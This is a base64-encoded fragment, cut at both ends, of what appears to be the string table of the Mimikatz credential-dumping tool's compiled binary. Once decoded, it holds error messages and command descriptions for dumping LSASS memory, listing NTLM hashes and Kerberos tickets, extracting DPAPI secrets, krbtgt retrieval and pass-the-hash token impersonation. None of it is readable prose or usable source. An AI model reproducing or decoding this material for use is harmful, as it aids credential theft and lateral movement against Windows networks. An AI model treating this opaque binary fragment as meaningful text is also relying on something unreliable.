IAZQBkACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFYAZQByAHkAQgBhAHMAaQBjAE0AbwBkAHUAbABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBzAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBjAHIAZQBkACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBjAHIAZQBkACAAOwAgAGsAdQBsAGwAXwBtAF8AcwBlAHIAdgBpAGMAZQBfAGcAZQB0AFUAbgBpAHEAdQBlAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAADwATgBVAEwATAA+AAAAAAAAAAAAAAAAAFQAYQByAGcAZQB0AE4AYQBtAGUAIAA6ACAAJQBzACAALwAgACUAcwAKAFUAcwBlAHIATgBhAG0AZQAgACAAIAA6ACAAJQBzAAoAQwBvAG0AbQBlAG4AdAAgACAAIAAgADoAIAAlAHMACgBUAHkAcABlACAAIAAgACAAIAAgACAAOgAgACUAdQAgAC0AIAAlAHMACgBQAGUAcgBzAGkAcwB0ACAAIAAgACAAOgAgACUAdQAgAC0AIAAlAHMACgBGAGwAYQBnAHMAIAAgACAAIAAgACAAOgAgACUAMAA4AHgACgAAAAAAAABDAHIAZQBkAGUAbgB0AGkAYQBsACAAOgAgAAAAAAAAAAoAQQB0AHQAcgBpAGIAdQB0AGUAcwAgADoAIAAlAHUACgAAAAAAAAAgAFsAJQAyAHUAXQAgAEEAdAB0AHIAaQBiAHUAdABlAAoAAAAAAAAAIAAgAEYAbABhAGcAcwAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAIAAgAEsAZQB5AHcAbwByAGQAIAA6ACAAJQBzAAoAAAAgACAAVgBhAGwAdQBlACAAIAAgADoAIAAAAAAAAAAAAGkAbgBmAG8AcwAAAAAAAABtAGkAbgBlAHMAdwBlAGUAcABlAHIAAABNAGkAbgBlAFMAdwBlAGUAcABlAHIAIABtAG8AZAB1AGwAZQAAAAAAbQBpAG4AZQBzAHcAZQBlAHAAZQByAC4AZQB4AGUAAAAAAAAAAAAAAEYAaQBlAGwAZAAgADoAIAAlAHUAIAByACAAeAAgACUAdQAgAGMACgBNAGkAbgBlAHMAIAA6ACAAJQB1AAoACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATQBlAG0AbwByAHkAIABDACAAKABSACAAPQAgACUAdQApAAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE0AZQBtAG8AcgB5ACAAUgAKAAAAAAAlAEMAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAEIAbwBhAHIAZAAgAGMAbwBwAHkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAEcAYQBtAGUAIABjAG8AcAB5AAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAEcAIABjAG8AcAB5AAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAEcAbABvAGIAYQBsACAAYwBvAHAAeQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAFMAZQBhAHIAYwBoACAAaQBzACAASwBPAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE0AaQBuAGUAcwB3AGUAZQBwAGUAcgAgAE4AVAAgAEgAZQBhAGQAZQByAHMACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAIAA7ACAATQBpAG4AZQBzAHcAZQBlAHAAZQByACAAUABFAEIACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwAgADsAIABOAG8AIABNAGkAbgBlAFMAdwBlAGUAcABlAHIAIABpAG4AIABtAGUAbQBvAHIAeQAhAAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAG4AZQBzAHcAZQBlAHAAZQByAF8AaQBuAGYAbwBzAF8AcABhAHIAcwBlAEYAaQBlAGwAZAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAHIAZQBhAGQAIABlAGwAZQBtAGUAbgB0AHMAIABmAHIAbwBtACAAYwBvAGwAdQBtAG4AOgAgACUAdQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAbgBlAHMAdwBlAGUAcABlAHIAXwBpAG4AZgBvAHMAXwBwAGEAcgBzAGUARgBpAGUAbABkACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAcgBlAGEAZAAgAHIAZQBmAGUAcgBlAG4AYwBlAHMAIABmAHIAbwBtACAAYwBvAGwAdQBtAG4AOgAgACUAdQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwBfAHAAYQByAHMAZQBGAGkAZQBsAGQAIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIAByAGUAYQBkACAAcgBlAGYAZQByAGUAbgBjAGUAcwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBuAGUAcwB3AGUAZQBwAGUAcgBfAGkAbgBmAG8AcwBfAHAAYQByAHMAZQBGAGkAZQBsAGQAIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIAByAGUAYQBkACAAZgBpAHIAcwB0ACAAZQBsAGUAbQBlAG4AdAAKAAAAAAAAAGwAcwBhAHMAcgB2AAAAAABMc2FJQ2FuY2VsTm90aWZpY2F0aW9uAABMc2FJUmVnaXN0ZXJOb3RpZmljYXRpb24AAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AbgB0ADUAXwBpAG4AaQB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBzAGUAYQByAGMAaAAKAAAAAABiAGMAcgB5AHAAdAAAAAAAQkNyeXB0T3BlbkFsZ29yaXRobVByb3ZpZGVyAAAAAABCQ3J5cHRTZXRQcm9wZXJ0eQAAAAAAAABCQ3J5cHRHZXRQcm9wZXJ0eQAAAAAAAABCQ3J5cHRHZW5lcmF0ZVN5bW1ldHJpY0tleQAAAAAAAEJDcnlwdEVuY3J5cHQAAABCQ3J5cHREZWNyeXB0AAAAQkNyeXB0RGVzdHJveUtleQAAAAAAAAAAQkNyeXB0Q2xvc2VBbGdvcml0aG1Qcm92aWRlcgAAAAAzAEQARQBTAAAAAAAAAAAAQwBoAGEAaQBuAGkAbgBnAE0AbwBkAGUAQwBCAEMAAABDAGgAYQBpAG4AaQBuAGcATQBvAGQAZQAAAAAAAAAAAE8AYgBqAGUAYwB0AEwAZQBuAGcAdABoAAAAAAAAAAAAQQBFAFMAAABDAGgAYQBpAG4AaQBuAGcATQBvAGQAZQBDAEYAQgAAAG0AcwB2AAAATABpAHMAdABzACAATABNACAAJgAgAE4AVABMAE0AIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAB3AGQAaQBnAGUAcwB0AAAATABpAHMAdABzACAAVwBEAGkAZwBlAHMAdAAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAAAABMAGkAcwB0AHMAIABLAGUAcgBiAGUAcgBvAHMAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAAAAAHQAcwBwAGsAZwAAAAAAAABMAGkAcwB0AHMAIABUAHMAUABrAGcAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMAAABsAGkAdgBlAHMAcwBwAAAATABpAHMAdABzACAATABpAHYAZQBTAFMAUAAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAAAAAAAABzAHMAcAAAAEwAaQBzAHQAcwAgAFMAUwBQACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAAAAAAGwAbwBnAG8AbgBQAGEAcwBzAHcAbwByAGQAcwAAAAAATABpAHMAdABzACAAYQBsAGwAIABhAHYAYQBpAGwAYQBiAGwAZQAgAHAAcgBvAHYAaQBkAGUAcgBzACAAYwByAGUAZABlAG4AdABpAGEAbABzAAAAAAAAAAAAAAAAAAAAUwB3AGkAdABjAGgAIAAoAG8AcgAgAHIAZQBpAG4AaQB0ACkAIAB0AG8AIABMAFMAQQBTAFMAIABwAHIAbwBjAGUAcwBzACAAIABjAG8AbgB0AGUAeAB0AAAAAAAAAAAAbQBpAG4AaQBkAHUAbQBwAAAAAAAAAAAAAAAAAAAAAABTAHcAaQB0AGMAaAAgACgAbwByACAAcgBlAGkAbgBpAHQAKQAgAHQAbwAgAEwAUwBBAFMAUwAgAG0AaQBuAGkAZAB1AG0AcAAgAGMAbwBuAHQAZQB4AHQAAAAAAAAAAABwAHQAaAAAAFAAYQBzAHMALQB0AGgAZQAtAGgAYQBzAGgAAAAAAAAAawByAGIAdABnAHQAIQAAAGQAcABhAHAAaQBzAHkAcwB0AGUAbQAAAEQAUABBAFAASQBfAFMAWQBTAFQARQBNACAAcwBlAGMAcgBlAHQAAABBAG4AdABpAHMAbwBjAGkAYQBsAAAAAABQAHIAZQBmAGUAcgByAGUAZAAgAEIAYQBjAGsAdQBwACAATQBhAHMAdABlAHIAIABrAGUAeQBzAAAAAAAAAAAAdABpAGMAawBlAHQAcwAAAEwAaQBzAHQAIABLAGUAcgBiAGUAcgBvAHMAIAB0AGkAYwBrAGUAdABzAAAAAAAAAGUAawBlAHkAcwAAAAAAAABMAGkAcwB0ACAASwBlAHIAYgBlAHIAbwBzACAARQBuAGMAcgB5AHAAdABpAG8AbgAgAEsAZQB5AHMAAAAAAAAATABpAHMAdAAgAEMAYQBjAGgAZQBkACAATQBhAHMAdABlAHIASwBlAHkAcwAAAAAAYwByAGUAZABtAGEAbgAAAEwAaQBzAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABNAGEAbgBhAGcAZQByAAAAAAAAAAAAcwBlAGsAdQByAGwAcwBhAAAAAAAAAAAAUwBlAGsAdQByAEwAUwBBACAAbQBvAGQAdQBsAGUAAABTAG8AbQBlACAAYwBvAG0AbQBhAG4AZABzACAAdABvACAAZQBuAHUAbQBlAHIAYQB0AGUAIABjAHIAZQBkAGUAbgB0AGkAYQBsAHMALgAuAC4AAAAAAAAAUwB3AGkAdABjAGgAIAB0AG8AIABQAFIATwBDAEUAUwBTAAoAAAAAAFMAdwBpAHQAYwBoACAAdABvACAATQBJAE4ASQBEAFUATQBQACAAOgAgAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AbQBpAG4AaQBkAHUAbQBwACAAOwAgADwAbQBpAG4AaQBkAHUAbQBwAGYAaQBsAGUALgBkAG0AcAA+ACAAYQByAGcAdQBtAGUAbgB0ACAAaQBzACAAbQBpAHMAcwBpAG4AZwAKAAAAAAAAAAAAAAAAAAAAAABPAHAAZQBuAGkAbgBnACAAOgAgACcAJQBzACcAIABmAGkAbABlACAAZgBvAHIAIABtAGkAbgBpAGQAdQBtAHAALgAuAC4ACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYQBjAHEAdQBpAHIAZQBMAFMAQQAgADsAIABMAFMAQQBTAFMAIABwAHIAbwBjAGUAcwBzACAAbgBvAHQAIABmAG8AdQBuAGQAIAAoAD8AKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAE0AaQBuAGkAZAB1AG0AcAAgAHAASQBuAGYAbwBzAC0APgBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgACgAJQB1ACkAIAAhAD0AIABNAEkATQBJAEsAQQBUAFoAXwBOAFQAXwBNAEEASgBPAFIAXwBWAEUAUgBTAEkATwBOACAAKAAlAHUAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATQBpAG4AaQBkAHUAbQBwACAAcABJAG4AZgBvAHMALQA+AFAAcgBvAGMAZQBzAHMAbwByAEEAcgBjAGgAaQB0AGUAYwB0AHUAcgBlACAAKAAlAHUAKQAgACEAPQAgAFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAXwBBAE0ARAA2ADQAIAAoACUAdQApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATQBpAG4AaQBkAHUAbQBwACAAdwBpAHQAaABvAHUAdAAgAFMAeQBzAHQAZQBtAEkAbgBmAG8AUwB0AHIAZQBhAG0AIAAoAD8AKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAEsAZQB5ACAAaQBtAHAAbwByAHQACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAEwAbwBnAG8AbgAgAGwAaQBzAHQACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAE0AbwBkAHUAbABlAHMAIABpAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATQBlAG0AbwByAHkAIABvAHAAZQBuAGkAbgBnAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBhAGMAcQB1AGkAcgBlAEwAUwBBACAAOwAgAEgAYQBuAGQAbABlACAAbwBuACAAbQBlAG0AbwByAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGEAYwBxAHUAaQByAGUATABTAEEAIAA7ACAATABvAGMAYQBsACAATABTAEEAIABsAGkAYgByAGEAcgB5ACAAZgBhAGkAbABlAGQACgAAAAAAAAAAAAkAJQBzACAAOgAJAAAAAABVAG4AZABlAGYAaQBuAGUAZABMAG8AZwBvAG4AVAB5AHAAZQAAAAAAVQBuAGsAbgBvAHcAbgAgACEAAAAAAAAASQBuAHQAZQByAGEAYwB0AGkAdgBlAAAATgBlAHQAdwBvAHIAawAAAEIAYQB0AGMAaAAAAAAAAABTAGUAcgB2AGkAYwBlAAAAUAByAG8AeAB5AAAAAAAAAFUAbgBsAG8AYwBrAAAAAABOAGUAdAB3AG8AcgBrAEMAbABlAGEAcgB0AGUAeAB0AAAAAAAAAAAATgBlAHcAQwByAGUAZABlAG4AdABpAGEAbABzAAAAAABSAGUAbQBvAHQAZQBJAG4AdABlAHIAYQBjAHQAaQB2AGUAAAAAAAAAQwBhAGMAaABlAGQASQBuAHQAZQByAGEAYwB0AGkAdgBlAAAAAAAAAEMAYQBjAGgAZQBkAFIAZQBtAG8AdABlAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAAAEMAYQBjAGgAZQBkAFUAbgBsAG8AYwBrAAAAAAAAAAAACgBBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AIABJAGQAIAA6ACAAJQB1ACAAOwAgACUAdQAgACgAJQAwADgAeAA6ACUAMAA4AHgAKQAKAFMAZQBzAHMAaQBvAG4AIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlAHMAIABmAHIAbwBtACAAJQB1AAoAVQBzAGUAcgAgAE4AYQBtAGUAIAAgACAAIAAgACAAIAAgACAAOgAgACUAdwBaAAoARABvAG0AYQBpAG4AIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAdwBaAAoATABvAGcAbwBuACAAUwBlAHIAdgBlAHIAIAAgACAAIAAgACAAOgAgACUAdwBaAAoAAAAAAAAAAABMAG8AZwBvAG4AIABUAGkAbQBlACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAABTAEkARAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAABQAHIAZQB2AGkAbwB1AHMAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGsAcgBiAHQAZwB0ACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAZgBpAG4AZAAgAEsARABDACAAcABhAHQAdABlAHIAbgAgAGkAbgAgAEwAUwBBAFMAUwAgAG0AZQBtAG8AcgB5AAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBrAHIAYgB0AGcAdAAgADsAIABLAEQAQwAgAHMAZQByAHYAaQBjAGUAIABuAG8AdAAgAGkAbgAgAEwAUwBBAFMAUwAgAG0AZQBtAG8AcgB5AAoAAAAKACUAcwAgAGsAcgBiAHQAZwB0ADoAIAAAAAAAAAAAACUAdQAgAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAKAAAACQAgACoAIAAlAHMAIAA6ACAAAAAAAAAARABQAEEAUABJAF8AUwBZAFMAVABFAE0ACgAAAAAAAABmAHUAbABsADoAIAAAAAAACgBtAC8AdQAgADoAIAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBkAHAAYQBwAGkAXwBzAHkAcwB0AGUAbQAgADsAIABOAG8AdAAgAGkAbgBpAHQAaQBhAGwAaQB6AGUAZAAhAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AZABwAGEAcABpAF8AcwB5AHMAdABlAG0AIAA7ACAAUABhAHQAdABlAHIAbgAgAG4AbwB0ACAAZgBvAHUAbgBkACAAaQBuACAARABQAEEAUABJACAAcwBlAHIAdgBpAGMAZQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAGQAcABhAHAAaQBfAHMAeQBzAHQAZQBtACAAOwAgAEQAUABBAFAASQAgAHMAZQByAHYAaQBjAGUAIABuAG8AdAAgAGkAbgAgAEwAUwBBAFMAUwAgAG0AZQBtAG8AcgB5AAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHQAcgB1AHMAdAAgADsAIABQAGEAdAB0AGUAcgBuACAAbgBvAHQAIABmAG8AdQBuAGQAIABpAG4AIABLAEQAQwAgAHMAZQByAHYAaQBjAGUACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AdAByAHUAcwB0ACAAOwAgAEsARABDACAAcwBlAHIAdgBpAGMAZQAgAG4AbwB0ACAAaQBuACAATABTAEEAUwBTACAAbQBlAG0AbwByAHkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwB0AHIAdQBzAHQAIAA7ACAATwBuAGwAeQAgAGYAbwByACAAPgA9ACAAMgAwADAAOAByADIACgAAAAAAAAAKACAAIABbACUAcwBdACAAAAAAAAAAAAAtAD4AIAAlAHcAWgAKAAAAJQB3AFoAIAAtAD4ACgAAAAkAZgByAG8AbQA6ACAAAAAJACoAIAAlAHMAIAA6ACAAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AYgBrAGUAeQAgADsAIABQAGEAdAB0AGUAcgBuACAAbgBvAHQAIABmAG8AdQBuAGQAIABpAG4AIABEAFAAQQBQAEkAIABzAGUAcgB2AGkAYwBlAAoAAAAAAAAAAABsAHUAaQBkAAAAAAAAAAAAaQBtAHAAZQByAHMAbwBuAGEAdABlAAAAcgB1AG4AAAB5AGUAcwAAAG4AbwAAAAAAAAAAAAAAAAB1AHMAZQByAAkAOgAgACUAcwAKAGQAbwBtAGEAaQBuAAkAOgAgACUAcwAKAHAAcgBvAGcAcgBhAG0ACQA6ACAAJQBzAAoAaQBtAHAAZQByAHMALgAJADoAIAAlAHMACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABNAGkAcwBzAGkAbgBnACAAYQByAGcAdQBtAGUAbgB0ACAAOgAgAGQAbwBtAGEAaQBuAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAATQBpAHMAcwBpAG4AZwAgAGEAcgBnAHUAbQBlAG4AdAAgADoAIAB1AHMAZQByAAoAAAAAAAAAAABBAEUAUwAxADIAOAAJADoAIAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAAQQBFAFMAMQAyADgAIABrAGUAeQAgAGwAZQBuAGcAdABoACAAbQB1AHMAdAAgAGIAZQAgADMAMgAgACgAMQA2ACAAYgB5AHQAZQBzACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAAQQBFAFMAMQAyADgAIABrAGUAeQAgAG8AbgBsAHkAIABzAHUAcABwAG8AcgB0AGUAZAAgAGYAcgBvAG0AIABXAGkAbgBkAG8AdwBzACAAOAAuADEAIAAoAG8AcgAgADcALwA4ACAAdwBpAHQAaAAgAGsAYgAyADgANwAxADkAOQA3ACkACgAAAEEARQBTADIANQA2AAkAOgAgAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAyADUANgAgAGsAZQB5ACAAbABlAG4AZwB0AGgAIABtAHUAcwB0ACAAYgBlACAANgA0ACAAKAAzADIAIABiAHkAdABlAHMAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABBAEUAUwAyADUANgAgAGsAZQB5ACAAbwBuAGwAeQAgAHMAdQBwAHAAbwByAHQAZQBkACAAZgByAG8AbQAgAFcAaQBuAGQAbwB3AHMAIAA4AC4AMQAgACgAbwByACAANwAvADgAIAB3AGkAdABoACAAawBiADIAOAA3ADEAOQA5ADcAKQAKAAAATgBUAEwATQAJADoAIAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAAbgB0AGwAbQAgAGgAYQBzAGgALwByAGMANAAgAGsAZQB5ACAAbABlAG4AZwB0AGgAIABtAHUAcwB0ACAAYgBlACAAMwAyACAAKAAxADYAIABiAHkAdABlAHMAKQAKAAAAAAAAAAAAAABtAG8AZABlAAkAOgAgAHIAZQBwAGwAYQBjAGkAbgBnACAATgBUAEwATQAvAFIAQwA0ACAAawBlAHkAIABpAG4AIABhACAAcwBlAHMAcwBpAG8AbgAKAAAAIAAgAHwAIAAgAFAASQBEACAAIAAlAHUACgAgACAAfAAgACAAVABJAEQAIAAgACUAdQAKAAAAAAAqACoAIABUAG8AawBlAG4AIABJAG0AcABlAHIAcwBvAG4AYQB0AGkAbwBuACAAKgAqAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGUAawB1AHIAbABzAGEAXwBwAHQAaAAgADsAIABTAGUAdABUAGgAcgBlAGEAZABUAG8AawBlAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAARAB1AHAAbABpAGMAYQB0AGUAVABvAGsAZQBuAEUAeAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAZQBrAHUAcgBsAHMAYQBfAHAAdABoACAAOwAgAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAVwBpAHQAaABMAG8AZwBvAG4AVwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBlAGsAdQByAGwAcwBhAF8AcAB0AGgAIAA7ACAATQBpAHMAcwBpAG4AZwAgAGEAdAAgAGwAZQBhAHMAdAAgAG8AbgBlACAAYQByAGcAdQBtAGUAbgB0ACAAOgAgAG4AdABsAG0ALwByAGMANAAgAE8AUgAgAGEAZQBzADEAMgA4ACAATwBSACAAYQBlAHMAMgA1ADYACgAAAAAAAAAgACAAfAAgACAATABVAEkARAAgACUAdQAgADsAIAAlAHUAIAAoACUAMAA4AHgAOgAlADAAOAB4ACkACgAAAAAAIAAgAFwAXwAgAG0AcwB2ADEAXwAwACAAIAAgAC0AIAAAAAAAAAAAACAAIABcAF8AIABrAGUAcgBiAGUAcgBvAHMAIAAtACAAAAAAAAAAAAAAAAAAAAAAAAoACQAgACoAIABVAHMAZQByAG4AYQBtAGUAIAA6ACAAJQB3AFoACgAJACAAKgAgAEQAbwBtAGEAaQBuACAAIAAgADoAIAAlAHcAWgAAAAAACgAJACAAKgAgAEwATQAgACAAIAAgACAAIAAgADoAIAAAAAAAAAAAAAoACQAgACoAIABOAFQATABNACAAIAAgACAAIAA6ACAAAAAAAAAAAAAKAAkAIAAqACAAUwBIAEEAMQAgACAAIAAgACAAOgAgAAAAAAAAAAAACgAJACAAKgAgAEQAUABBAFAASQAgACAAIAAgADoAIAAAAAAAAAAAAAoACQAgACoAIABSAGEAdwAgAGQAYQB0AGEAIAA6ACAAAAAAAAAAAAAKAAkAIAAqACAAUwBtAGEAcgB0AGMAYQByAGQAAAAAAAoACQAgACAAIAAgACAAUABJAE4AIABjAG8AZABlACAAOgAgACUAdwBaAAAAAAAAAAAAAAAAAAAACgAJACAAIAAgACAAIABDAGEAcgBkACAAIAAgACAAIAA6ACAAJQBzAAoACQAgACAAIAAgACAAUgBlAGEAZABlAHIAIAAgACAAOgAgACUAcwAKAAkAIAAgACAAIAAgAEMAbwBuAHQAYQBpAG4AZQByADoAIAAlAHMACgAJACAAIAAgACAAIABQAHIAbwB2AGkAZABlAHIAIAA6ACAAJQBzAAAAAAAAAAAACQAgACAAIAAlAHMAIAAAADwAbgBvACAAcwBpAHoAZQAsACAAYgB1AGYAZgBlAHIAIABpAHMAIABpAG4AYwBvAHIAcgBlAGMAdAA+AAA